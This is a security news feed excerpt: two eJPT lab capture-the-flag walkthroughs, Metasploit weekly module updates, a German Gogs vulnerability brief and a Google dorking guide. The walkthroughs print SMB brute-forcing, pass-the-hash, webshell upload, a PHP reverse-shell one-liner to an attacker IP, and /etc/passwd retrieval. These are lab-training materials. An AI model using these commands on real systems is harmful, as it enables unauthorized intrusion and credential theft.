<guid isPermaLink="true">https://tsecurity.de/de/3644766/hacking/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine/</guid>
<pubDate>Sat, 04 Jul 2026 06:38:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WSgKYo-05kW30HkJVVXq6g.png"></figure><p>Hello everyone!</p><p>In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefully, each one actually unlocks the answer for the next. The lab is designed as a chain, and once you spot that pattern it flows naturally from start to finish.</p><p>So, let’s dive in.</p><h3>Q. Looks like SMB user tom has not changed his password from a very long time.</h3><p>As usual, I started with an Nmap scan and opened Metasploit in parallel:</p><pre>nmap -T4 -sV -O -sC target.ine.local<br>service postgresql start &amp;&amp; msfconsole -q -x "workspace -a win"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oJnLRDsDqaLK4PpVK7H9cA.png"></figure><p>The scan revealed several open ports — FTP on 21, HTTP on 80, SMB on 445, and RDP on 3389. The question was pointing directly at SMB and a user called tom with a weak password, so I loaded the smb_login auxiliary module and brute-forced it against the provided wordlist:</p><pre>use auxiliary/scanner/smb/smb_login<br>set rhosts target.ine.local<br>set smbuser tom<br>set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*b_DLaqLgziKlQRe_Xz4_xQ.png"></figure><p>Got it. With valid credentials, I listed the available SMB shares using smbmap:</p><pre>smbmap -H target.ine.local -u tom -p &lt;password&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/977/1*Qc5Dxk1rjL_Q_U_IsGAynQ.png"></figure><p>Tom had read access to HRDocuments. I connected and listed the contents:</p><pre>smbclient //target.ine.local/HRDocuments -U tom --password &lt;password&gt;<br>smb: \&gt; ls</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/863/1*F3bWrV817n3V-f0OT4Qf4A.png"></figure><p>Two files — flag1.txt and leaked-hashes.txt. Flag 1 captured, and the hashes file was clearly the hint for the next question.</p><h3>Q. Using the NTLM hash list discovered in the previous challenge, can you compromise the SMB user nancy?</h3><p>The leaked hashes file contained multiple NTLM hashes. The question pointed at user nancy, so instead of cracking the hashes I went straight to a Pass-the-Hash attack — using the hashes directly against SMB:</p><pre>use auxiliary/scanner/smb/smb_login<br>set rhosts target.ine.local<br>set smbuser nancy<br>set pass_file leaked-hashes.txt<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0YA_XR_8hYJMxItbut_nYQ.png"></figure><p>One hash matched. For SMB authentication the format is &lt;LM_HASH&gt;:&lt;NT_HASH&gt; — only the NT portion matters. I used it to connect directly with --pw-nt-hash:</p><pre>smbclient //target.ine.local/ITResources -U nancy --pw-nt-hash &lt;NT_hash&gt;<br>smb: \&gt; ls</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MvOt-06WrgwjE7d5prRexg.png"></figure><p>Two files inside — flag2.txt and hint.txt. Flag 2 captured. I grabbed the hint file:</p><pre>smb: \&gt; get hint.txt</pre><h3>Q. I wonder what the hint found in the previous challenge could be useful for!</h3><p>I opened the hint file:</p><pre>cat hint.txt</pre><p>It contained a set of credentials for a user called david. The Nmap scan had shown FTP open on port 21, so I tried them there:</p><pre>ftp ftp://david:&lt;password&gt;@target.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/709/1*LtkWe_au8aCOkgAeNDz8pA.png"></figure><p>Logged in. Listing the FTP directory showed flag3.txt sitting right there alongside the default IIS files. Flag 3 captured.</p><h3>Q. Can you compromise the target machine and retrieve the C:\flag4.txt file?</h3><p>Still in the FTP session — and the FTP root appeared to be the IIS web root (same iisstart.htm and iis-85.png from the default IIS page). That meant anything uploaded via FTP would be accessible directly from the web server.</p><p>I uploaded an ASPX webshell:</p><pre>ftp&gt; put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ja1FUAcGICaVpg8kq4dXmA.png"></figure><p>Then opened it in the browser:</p><pre>http://target.ine.local/cmd.aspx</pre><p>The webshell gave me a command input field. I ran:</p><pre>type C:\flag4.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nVUJMoE-3SfE6-kUyL-zIQ.png"></figure><p>Flag 4 returned directly in the browser.</p><h3>Final Thoughts</h3><p>This CTF was well designed — each flag handed you exactly what you needed for the next one. Tom’s weak password gave the NTLM hashes. The hashes gave nancy’s access. Nancy’s share gave david’s credentials. David’s FTP session gave webshell upload, and the webshell gave the final flag.</p><p>The Pass-the-Hash step was the most interesting technically. You never need to crack an NTLM hash to use it — Windows authentication accepts the hash directly, which means a leaked hash file is often as good as a plaintext password list.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=77fea8b4433d" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine-77fea8b4433d">Host &amp; Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: Modules for SMB-to-Meterpreter, Peyara Remote Mouse RCE exploit, and more]]></title>
<description><![CDATA[It's Time to Upgrade Your SMB SessionThis week, Metasploit contributor Dean Welch has added an SMB to Meterpreter session upgrade module. It uses PsExec to facilitate the upgrade. Users can load the module with use windows/manage/smb_to_meterpreter and specify the session number they wish to upgr...]]></description>
<link>https://tsecurity.de/de/3644553/it-security-nachrichten/weekly-metasploit-update-modules-for-smb-to-meterpreter-peyara-remote-mouse-rce-exploit-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644553/it-security-nachrichten/weekly-metasploit-update-modules-for-smb-to-meterpreter-peyara-remote-mouse-rce-exploit-and-more/</guid>
<pubDate>Sat, 04 Jul 2026 01:52:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>It's Time to Upgrade Your SMB Session</h2><p>This week, Metasploit contributor Dean Welch has added an SMB to Meterpreter session upgrade module. It uses PsExec to facilitate the upgrade. Users can load the module with use <span data-type="inlineCode">windows/manage/smb_to_meterpreter</span> and specify the session number they wish to upgrade. This functionality is also available with the command <span data-type="inlineCode">sessions -u &lt;session_id&gt;</span>. This work is part of an overarching effort to enable a variety of session types to be upgraded to Meterpreter when possible.</p><h2>New module content (3)</h2><h3>Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution</h3><p>Author: tmrswrr</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21491">#21491</a> contributed by <a href="https://github.com/capture0x">capture0x</a></p><p>Path: <span data-type="inlineCode">windows/misc/peyara_remote_mouse_rce</span></p><p>Description: Adds an exploit module for Peyara Remote Mouse v1.0.1 unauthenticated RCE.</p><h3>Linux Execute Command</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp</p><p>Type: Payload (Single)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21239">#21239</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: <span data-type="inlineCode">linux/loongarch64/exec</span></p><p>Description: Adds a new linux/loongarch64/exec command payload.</p><h3>SMB to Meterpreter Upgrade via PsExec</h3><p>Author: Dean Welch</p><p>Type: Post</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21581">#21581</a> contributed by <a href="https://github.com/dwelch-r7">dwelch-r7</a></p><p>Path: <span data-type="inlineCode">windows/manage/smb_to_meterpreter</span></p><p>Description: Adds the ability to upgrade authenticated SMB sessions to Meterpreter sessions using PsExec techniques.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21527">#21527</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Adds authentication support to the MCP server's HTTP transport by default.</li></ul><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21618">#21618</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Fixes a crash when running the <span data-type="inlineCode">scanner/discovery/udp_sweep</span> module on Windows environments.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21624">#21624</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug with SSH session's debug information showing the incorrect value <span data-type="inlineCode">localuser @</span> instead of <span data-type="inlineCode">ssh_user @ ssh_ip</span>.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-06-24T23%3A18%3A10Z..2026-07-01T09%3A42%3A42Z%22">Pull Requests 6.4.141...6.4.142</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.141...6.4.142">Full diff 6.4.141...6.4.142</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: Exploitation CTF 1 — eJPT (INE)]]></title>
<description><![CDATA[A walkthrough covering flatCore CMS exploitation, SSH brute-forcing, WordPress plugin enumeration, and unauthenticated file read to capture all four flags.Hello everyone!In this blog, I’ll walk through Exploitation CTF 1 from INE’s eJPT path. Two Linux targets running different web applications —...]]></description>
<link>https://tsecurity.de/de/3643712/hacking/host-network-penetration-testing-exploitation-ctf-1-ejpt-ine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643712/hacking/host-network-penetration-testing-exploitation-ctf-1-ejpt-ine/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A walkthrough covering flatCore CMS exploitation, SSH brute-forcing, WordPress plugin enumeration, and unauthenticated file read to capture all four flags.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*e4AoQhhAgvvMjiR7Qi0gaQ.png"></figure><p>Hello everyone!</p><p>In this blog, I’ll walk through Exploitation CTF 1 from INE’s eJPT path. Two Linux targets running different web applications — flatCore CMS and WordPress — each with their own vulnerable plugin or exploit path. The flags are formatted as MD5 hashes, and the lab gives us a head start with one set of credentials.</p><p>So, let’s dive in.</p><h3>Q. Identify and exploit the vulnerable web application running on target1.ine.local and retrieve the flag from the root directory. The credentials admin:password1 may be useful.</h3><p>As usual, I started with an Nmap scan:</p><pre>nmap -sV -O target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6Z_QMJbMqMs8vCYT5XT6aw.png"></figure><p>Port 80 and 22 were open. I checked out the website running on port 80 and found a login page in what looked like German — turned out to be <strong>flatCore CMS</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3WwSZH_6u-ASJjHd09KFlQ.png"></figure><p>I tried the credentials given in the question — admin:password1 — and they worked.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tsYadn9DPzB6ZogjWCqQhA.png"></figure><p>I checked robots.txt and found /acp/ listed under Disallow. Navigated there directly.</p><p>It was the CMS admin login page. I tried the same credentials there too, and got into the admin panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KMTwo1o9Pv0sjsey42pYhg.png"><figcaption>CMS login page</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p006r3I_IsCmrFD6STLKqA.png"></figure><p>With confirmed access to flatCore CMS, I searched for known exploits:</p><pre>searchsploit flatcore cms</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1023/1*Xb9gss0rJBH_32vikUE27w.png"></figure><p>Found an authenticated exploit — and since we already have valid admin credentials, that requirement was already satisfied. I set it up and ran it with Python 3.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/738/1*1Pli0gJS6nMEAyq1nZVpXQ.png"></figure><p>A shell popped, and the first flag was sitting right there.</p><h3>Q. Further, identify and compromise an insecure system user on target1.ine.local.</h3><p>Still in that shell, I wanted to bring it into Metasploit for easier post-exploitation. I started a multi/handler listener, then triggered a reverse shell back to it using a PHP one-liner generated from revshells.com:</p><pre>php -r '$sock=fsockopen("&lt;your-ip&gt;",&lt;port&gt;);exec("sh &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</pre><p>Once the shell connected, I upgraded it to a full Meterpreter session:</p><pre>sessions -u &lt;id&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pBA-akGfmnIqKzPxB-GgfQ.png"></figure><p>Inside the Meterpreter session, I found a user called iamaweakuser with a home directory — but no permission to read into it. The username itself was a strong hint, so I brute-forced SSH against that account:</p><pre>hydra -l iamaweakuser -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local ssh</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AmKI9xNtfWoMARMfsynslA.png"></figure><p>Hydra found the password. Logging in over SSH with those credentials gave me Flag 2.</p><h3>Q. Identify and exploit the vulnerable plugin used by the web application running on target2.ine.local and retrieve the flag3.txt file from the root directory.</h3><p>Moved to the second target with a fresh Nmap scan, this time including default scripts:</p><pre>nmap -sV -sC target2.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*eKvIk0WNx5NBLYqIk4LYFQ.png"></figure><p>Port 22 and 80 were open, with port 80 running <strong>WordPress</strong>. Since the question specifically asked about a vulnerable plugin, I enumerated installed plugins:</p><pre>nmap -sV -p 80 target2.ine.local --script=http-wordpress-enum</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ssr6ONAHI3umfQfA_29Z3A.png"></figure><p>Two plugins came back — akismet 5.0.1 and duplicator 1.3.26. I searched both for known vulnerabilities and found that <strong>Duplicator 1.3.26</strong> is affected by an unauthenticated arbitrary file download / directory traversal vulnerability — and Metasploit already had a module for it.</p><p>I loaded it up and set the filepath to grab the flag directly:</p><pre>use auxiliary/scanner/http/wp_duplicator_file_read<br>set rhosts target2.ine.local<br>set filepath /flag3.txt<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6b-0KUYU2uLW9rsbrwLynQ.png"></figure><p>The file came back with Flag 3 inside it — no authentication required at any point.</p><h3>Q. Further, identify and compromise a system user requiring no authentication on target2.ine.local.</h3><p>Using the same module, I changed the target file to pull system user information instead:</p><pre>set filepath /etc/passwd<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1012/1*gYNWTRUYvv_G2Mv4wmDxzg.png"></figure><p>Scrolling through the output, one account stood out from the standard system accounts — iamacrazyfreeuser, with a real home directory and shell access. The username was the giveaway. I tried SSH with no password at all:</p><pre>ssh iamacrazyfreeuser@target2.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/865/1*0GS6_-vXqDL0S6wYXQ1sxA.png"></figure><p>No authentication required — straight in, and Flag 4 was waiting.</p><h3>Final Thoughts</h3><p>This CTF was a solid mix of web app exploitation and credential-based attacks across two different CMS platforms.</p><p>The Duplicator plugin vulnerability stood out the most — an unauthenticated arbitrary file read is a serious finding on its own, and here it directly handed over both the flag and the /etc/passwd file needed for the next step, no exploitation chain required. On the flatCore side, the lesson was simpler but just as common in real engagements: weak or default credentials, once again, were the way in.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e675eabf7f0c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-1-ejpt-ine-e675eabf7f0c">Host &amp; Network Penetration Testing: Exploitation CTF 1 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gogs-Lücke gibt jedem Konto RCE-Rechte auf dem Server]]></title>
<description><![CDATA[Eine kritische Lücke in der selbst gehosteten Git-Plattform Gogs gibt jedem angemeldeten Konto Rechte zur Remote Code Execution auf dem Server. Ein öffentlich verfügbares Metasploit-Modul automatisiert den Angriff in Se­kun­den. Ver­si­on 0.14.3 behebt die Schwachstelle.]]></description>
<link>https://tsecurity.de/de/3634630/it-security-nachrichten/gogs-luecke-gibt-jedem-konto-rce-rechte-auf-dem-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634630/it-security-nachrichten/gogs-luecke-gibt-jedem-konto-rce-rechte-auf-dem-server/</guid>
<pubDate>Tue, 30 Jun 2026 07:37:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine kritische Lücke in der selbst gehosteten Git-Plattform Gogs gibt jedem angemeldeten Konto Rechte zur Remote Code Execution auf dem Server. Ein öffentlich verfügbares Metasploit-Modul automatisiert den Angriff in Se­kun­den. Ver­si­on 0.14.3 behebt die Schwachstelle.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacking With Google]]></title>
<description><![CDATA[Using Search Engines for Dorking and ReconnaissanceGoogle is one of the most powerful tools in a security researcher’s arsenal — not just for looking things up, but for finding specific information about targets, vulnerabilities, exposed assets, and people. This technique is known as Google dorki...]]></description>
<link>https://tsecurity.de/de/3632620/hacking/hacking-with-google/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632620/hacking/hacking-with-google/</guid>
<pubDate>Mon, 29 Jun 2026 12:21:08 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Using Search Engines for Dorking and Reconnaissance</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wlvVOSqqilwT9LAegoX5Pw.jpeg"></figure><p>Google is one of the most powerful tools in a security researcher’s arsenal — not just for looking things up, but for finding specific information about targets, vulnerabilities, exposed assets, and people. This technique is known as <strong>Google dorking</strong>, and it’s a core part of open source intelligence (OSINT) gathering during penetration tests, bug bounties, and vulnerability disclosure programs.</p><p>If you’d like to follow what I did via video, feel free to check it out on YouTube below:</p><a href="https://medium.com/media/a58d6b7cbe6186a6661fe64a3a79b6c8/href">https://medium.com/media/a58d6b7cbe6186a6661fe64a3a79b6c8/href</a><h3>Researching Vulnerabilities by Service Version</h3><p>One of the most straightforward uses of Google in security research is looking up known vulnerabilities for a specific service version. When an Nmap scan reveals that a target is running, say, vsftpd 2.3.4, the next step is simply searching for it in Google:</p><pre>vsftpd 2.3.4 exploit</pre><p>This returns CVE entries from NIST (the National Institute of Standards and Technology — the gold standard for vulnerability documentation), Rapid7’s Metasploit module database, Nmap NSE scripts, and community walkthroughs. The same approach applies to any software version discovered during reconnaissance: a web application running jQuery 3.1.1, an outdated CMS, an exposed API framework. Search the version plus “exploit” or “vulnerability” and see what’s documented.</p><p>This is a fundamental part of the research process during any security assessment.</p><h3>Google Dorks: Advanced Search Operators</h3><p>Google dorking refers to using Google’s built-in search operators in precise combinations to return highly specific results. Here’s a breakdown of the most useful ones.</p><h4>Exact phrases with quotes</h4><p>Wrapping a term in quotes forces Google to match it exactly. Say for example, you are researching a person for an investigation or an executive for an external penetration test that includes social engineering:</p><pre>"John Smith"</pre><p>This eliminates loosely related results and focuses the search on that exact string.</p><h4>Combining terms to narrow results</h4><p>Adding additional keywords refines the search further if you want to search for that person and a possible wedding, out of say a specific city and state:</p><pre>"John Smith" wedding Sacramento California</pre><p>The more context you add, the more targeted the results become.</p><h4>Wildcard operator ( * )</h4><p>An asterisk acts as a wildcard, substituting for any word or character. Think of regular expressions as they apply to searching text files in a Linux environment. You can add this to someone’s name, for example, to search for anyone with a middle initial in that name:</p><pre>"John * Smith"</pre><p>This returns results for John Smith with any middle name or initial — useful when you know a name but not all the details.</p><h4>Site operator (site:)</h4><p>This restricts results to a specific domain or site. An example could be trying to find a social media profile for “John Smith” in instagram:</p><pre>"John Smith" site:instagram.com</pre><p>This can also be great for limiting research to a particular organization’s web presence.</p><h4>Minus operator (-)</h4><p>A minus sign excludes specific terms or sites from results. This is great for filtering results and narrowing things down like searching for subdomains:</p><pre>"John Smith" -"John L. Smith"</pre><h4>File type operator (filetype:)</h4><p>Finds specific file types indexed by Google:</p><pre>"John * Smith" site:.gov filetype:pdf</pre><p>This returns PDFs from government websites matching the name pattern — potentially useful for finding resumes, reports, or documents containing contact information and professional details. In a penetration test context, the same technique can uncover exposed configuration files, credentials stored in text files, or publicly accessible code.</p><h4>URL and page content operators</h4><ul><li>inurl: — searches for a specific string within the URL itself</li><li>intitle: — searches within the page title</li><li>intext: — searches within the body text of a page</li></ul><p>For example:</p><pre>site:example.com inurl:admin</pre><p>This looks for admin panels on a specific domain — a common check during web application penetration tests and bug bounties.</p><h3>Subdomain Enumeration with Google</h3><p>During web application reconnaissance, finding subdomains is an important step. Google can help surface subdomains that have been indexed:</p><pre>site:*.example.com</pre><p>As you discover subdomains, subtract them from future searches to avoid seeing the same results and uncover new ones:</p><pre>site:*.example.com -www -careers</pre><p>This iterative process of finding and subtracting results helps surface less obvious subdomains that may have weaker security configurations or expose additional attack surface. That said, Google is just one of many tools for subdomain enumeration — tools like Sublist3r, Subfinder, and Amass are also commonly used alongside certificate transparency log parsing.</p><h3>Finding Exposed Cloud Assets</h3><p>Google can also index publicly exposed cloud storage buckets that organizations didn’t intend to make discoverable:</p><pre>site:s3.amazonaws.com "example company"</pre><p>or</p><pre>site:amazonaws.com "example company"</pre><p>Exposed S3 buckets occasionally contain sensitive information — internal documents, credential files, username naming conventions, or configuration data — that can be valuable during a security assessment. This is a well-known misconfiguration and a common finding in bug bounty programs.</p><h3>The Google Hacking Database</h3><p>The <strong>Google Hacking Database (GHDB)</strong>, maintained by Exploit-DB, is a public repository of pre-built Google dorks contributed by the security community. It covers categories like:</p><ul><li>Finding sensitive files and directories</li><li>Identifying exposed login pages</li><li>Locating vulnerable web applications</li><li>Discovering publicly accessible network devices</li></ul><p>It’s a valuable reference, especially when starting out with Google dorking. Browsing the database gives you a sense of what’s possible and provides ready-to-use queries you can adapt for your own research.</p><h3>Summary of Key Operators</h3><ul><li>"quotes" Match exact phrase</li><li>* Wildcard for any word</li><li>- Exclude a term or site</li><li>site: Restrict to a specific domain</li><li>filetype: Find specific file types</li><li>inurl: Search within URLs</li><li>intitle: Search within page titles</li><li>intext: Search within page body text</li></ul><p>Google dorking is a passive reconnaissance technique — you’re querying publicly available, indexed information. However, it’s still important to only use these techniques against systems and targets you have explicit permission to test. Bug bounty programs and vulnerability disclosure programs (VDPs) are legitimate contexts for this kind of research. Targeting organizations without authorization is illegal regardless of the method used.</p><p>This is a skill that improves with practice. Start with the operators above, explore the Google Hacking Database, and apply these techniques within the scope of legitimate security research. The more precisely you can query, the more useful the results become.</p><p>Checkout my <a href="https://www.youtube.com/@Red-2876">YouTube</a></p><p><a href="https://buymeacoffee.com/coderedblog">Buy me a coffee!</a></p><p>Feel free to follow me on here and keep learning!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=26b8e134ee22" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/hacking-with-google-26b8e134ee22">Hacking With Google</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Metasploit Update: Modules for Audiobookshelf, LiteLLM, Next.js, Dalfox and more]]></title>
<description><![CDATA[Help shape the future of Metasploit FrameworkWe are planning future work in relation to the evasion capabilities present in Metasploit Framework, and how they function/are presented to users. We are currently accepting responses to our feedback form, which means that you can shape the future of h...]]></description>
<link>https://tsecurity.de/de/3628469/it-security-nachrichten/weekly-metasploit-update-modules-for-audiobookshelf-litellm-nextjs-dalfox-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628469/it-security-nachrichten/weekly-metasploit-update-modules-for-audiobookshelf-litellm-nextjs-dalfox-and-more/</guid>
<pubDate>Fri, 26 Jun 2026 21:53:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Help shape the future of Metasploit Framework</h2><p>We are planning future work in relation to the evasion capabilities present in Metasploit Framework, and how they function/are presented to users. We are currently accepting responses to our feedback form, which means that you can shape the future of how evasive capabilities are implemented in Metasploit Framework. The proposal for the changes can be found <a href="https://gist.github.com/smcintyre-r7/09488f45904d73ff0ce0d5a7f7e5a830">here</a>, and you can submit your responses to the form <a href="https://docs.google.com/forms/d/e/1FAIpQLSfa1JVJzqrQ2lh9a0peW8VGs3pNSb47vw5RJWVicfiQU5bpDg/viewform?usp=publish-editor">here</a>. The form will stop accepting responses on the 1st of July, 2026.</p><p>New module content and improvements have also been added this week. This includes a Next.js Middleware Authorization Bypass scanner, LiteLLM Proxy SQL Injection, an unauthenticated API authentication bypass scanner for Audiobookshelf, a deserialization RCE in Dalfox, and improvements to service and host reporting in bruteforce-related modules.</p><h2>New module content (4)</h2><h3>Audiobookshelf Unauthenticated API Authentication Bypass Scanner</h3><p>Authors: Kenneth LaCroix and swiftbird07</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21565">#21565</a> contributed by <a href="https://github.com/kenlacroix">kenlacroix</a></p><p>Path: scanner/http/audiobookshelf_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-25205&amp;referrer=blog">CVE-2025-25205</a></p><p>Description: Adds audiobookshelf_auth_bypass, a detection module for CVE-2025-25205 — an unauthenticated API authentication bypass in Audiobookshelf (self-hosted audiobook/podcast server), affecting versions 2.17.0 – 2.19.0 (fixed in 2.19.1).</p><h3>BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner</h3><p>Authors: Kenneth LaCroix and Tencent YunDing Security Lab</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21567">#21567</a> contributed by <a href="https://github.com/kenlacroix">kenlacroix</a></p><p>Path: scanner/http/litellm_proxy_sqli</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-42208&amp;referrer=blog">CVE-2026-42208</a></p><p>Description: Adds auxiliary/scanner/http/litellm_proxy_sqli, a detection module for CVE-2026-42208 (CVSS 9.3, on the CISA KEV list) — a pre-authentication SQL injection in BerriAI LiteLLM proxy.</p><h3>Next.js Middleware Authorization Bypass Scanner</h3><p>Authors: Kenneth LaCroix, Rachid Allam, and Yasser Allam</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21566">#21566</a> contributed by <a href="https://github.com/kenlacroix">kenlacroix</a></p><p>Path: scanner/http/nextjs_middleware_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-29927&amp;referrer=blog">CVE-2025-29927</a></p><p>Description: Adds nextjs_middleware_auth_bypass, a detection module for CVE-2025-29927 (CVSS 9.1) — an authorization bypass in self-hosted Next.js applications.</p><h3>Dalfox Found-Action Deserialization RCE</h3><p>Authors: Emmanuel David and Takahiro Yokoyama</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21493">#21493</a> contributed by <a href="https://github.com/Takahiro-Yoko">Takahiro-Yoko</a></p><p>Path: linux/http/dalfox_server_rce_cve_2026_45087</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-45087&amp;referrer=blog">CVE-2026-45087</a></p><p>Description: This adds an exploit module for Dalfox Server versions &lt;= 2.12.0 which are vulnerable to an unauthenticated RCE tracked as CVE-2026-45087. The vulnerability allows attackers to send arbitrary commands via found-action post parameter which gets deserialized and run in the context of the user running the server.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21396">#21396</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This makes improvements to the auth_brute mixin. It adds report_host and report_service calls to the mixin and removes duplicate printing of IP:PORT in the print_brute statements.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21562">#21562</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updated the usage of rex-socket's recvfrom method to align with the standard library implementation. This also allows rex-socket to now be used as a drop-in replacement for Ruby's UDPSocket.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-06-22T13%3A23%3A28%2B01%3A00..2026-06-24T23%3A18%3A10Z%22">Pull Requests 